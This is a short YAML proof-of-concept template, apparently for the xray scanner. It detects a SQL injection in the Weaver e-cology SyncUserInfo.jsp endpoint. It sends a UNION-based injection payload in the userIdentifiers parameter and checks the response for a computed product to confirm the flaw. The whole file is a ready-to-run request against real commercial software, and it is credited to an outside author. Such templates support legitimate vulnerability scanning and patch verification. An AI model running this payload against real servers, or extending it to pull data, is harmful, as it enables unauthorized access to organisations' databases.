name: poc-yaml-ecology-syncuserinfo-sqli
manual: true
transport: http
set:
    r1: randomInt(40000, 44800)
    r2: randomInt(40000, 44800)
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({{r1}}*{{r2}}),null
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()
detail:
    author: MaxSecurity(https://github.com/MaxSecurity)
    links:
        - https://www.weaver.com.cn/
